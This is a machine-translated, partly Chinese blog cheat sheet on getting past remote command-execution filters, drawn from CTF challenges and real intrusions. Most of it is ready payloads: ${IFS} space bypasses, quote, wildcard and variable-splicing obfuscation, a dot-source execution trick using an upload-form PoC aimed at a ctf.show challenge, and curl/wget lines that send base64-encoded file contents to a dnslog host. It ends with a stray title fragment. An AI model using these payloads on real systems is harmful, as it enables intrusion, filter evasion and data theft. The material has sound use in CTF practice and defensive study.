The RCE bypass methods in this article are all encountered by bloggers in CTF topics and infiltration actual combat. There may be omissions or mistakes. I hope you guys can point out more, thank you!

1. Common alternative commands:

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器，这个也可以查看
vim:一种编辑器，这个也可以查看
sort:可以查看
uniq:可以查看
ls：查看目录
dir：查看目录

Two, space bypass

> < <> 重定向符
%20(space)
%09(tab)
$IFS$9 
${IFS}（最好用这个）
$IFS  
{cat,flag.txt} 在大括号中逗号可起分隔作用

3. Simple symbols bypass regularity

1. Single and double quotation marks

ca''t flag.txt
ca""t flag.txt

Because there are no characters in the single and double quotation marks, it is equivalent to adding no characters in it, and the meaning of the command remains the same

2. The cross-line character '\' is bypassed

The meaning of the cross-line character is to follow the content of the previous line, go to the next line and then enter the command. Both the upper and lower lines are a command

4. Wildcards bypass regularity

Wildcards can replace any character

Shell wildcards are:

* : Indicates wildcard characters 0 times or more

? : Indicates the wildcard character 0 or

1. Commands that can be obtained by wildcarding

base64：

/bin/base64 可以通配为：

/???/????64

作用为将文件以base64编码形式输出

bzip2：

/usr/bin/bzip2 可以通配为：

/???/???/????2

作用为将文件压缩成后缀为bz2的压缩文件
flag.php ==>  flag.php.bz2

2. String wildcard

flag.php ==> flag.???
             flag*
             ……

Of course, wildcards can be used to wildcard some commands, but not the full name

例如：
/bin/ca?
相当于cat命令

Five, variable splicing bypasses regularity

Variables can be defined in the shell statement to divide the filtered string into parts to bypass

以flag.php为例:

x=lag;cat f$x.php

相当于:

cat flag.php

6. Inline execution

Inline execution is to embed a subshell statement in a shell statement, and use the main shell statement to process the result of the substatement

Symbols you can use for inline statements you ${}, `` (backticks)

For example:

echo `ls`

echo ${ls}

相当于把ls的结果使用echo输出

7. "${}" intercepts environment variable splicing

For the usage of ${}, please check my blog http://t.csdn.cn/JDFmP

example

${PATH:14:1}${PATH:5:1} flag.txt

在此环境中相当于 nl flag.txt

Eight, [] square brackets match bypass

For example, [ac] represents matching characters between ab, including a, b characters themselves

The matching range is the current directory

example

/[a-c][h-j][m-o]/[b-d]a[s-u] flag.txt
 
相当于
/bin/cat flag.txt

因为[]匹配范围只在当前路径
所以要为bin绝对路径

Nine, source command:

The source command, also known as the dot command, can be replaced by a dot ( . )

This command can read and execute the commands in the file

Can build a file upload form, upload command file execution

The form is:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名：</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

The get request is

?c=.+/???/????????[@-[]

一般来说这个文件在linux下面保存在/tmp/php??????一般后面的6个字符是随机生成的有大小写。（可以通过linux的匹配符去匹配）

注意：通过.去执行sh命令不需要有执行权限

可以参考p神的这篇文章Improvement of non-alphanumeric webshell | Farewell song

10. No echo rce:

Execution function without echo:

exec()

shell_exec()

`` (backtick)

These require the php function echo to output the results

1. Copy to an accessible file

tee command:

The tee command can be used to create or append to a file

It can cooperate with open file commands such as cat and the pipe character to write the flag into the specified file

For example

先将根目录复制到某个文件，然后访问查看
ls /| tee ls.txt

然后输入 url/1.txt  即可查看根目录

再复制flag文件，然后访问查看
cat /flag.php | tee flag.txt

然后输入 url/falg.txt  即可查看根目录

还可以使用其他的复制方法
copy /flag.php flag.txt

mv /flag.php flag.txt

2. dnslog external data method

Need dnslog platform, you can build it yourself

curl dnslog平台url/`cat flag.php|base64`
wget dnslog平台url/`cat flag.php|base64`

3. Rebound shell:

I will write it when I write the right to raise

RCE (Remote Command Execution) Bypass Summary

Foreword: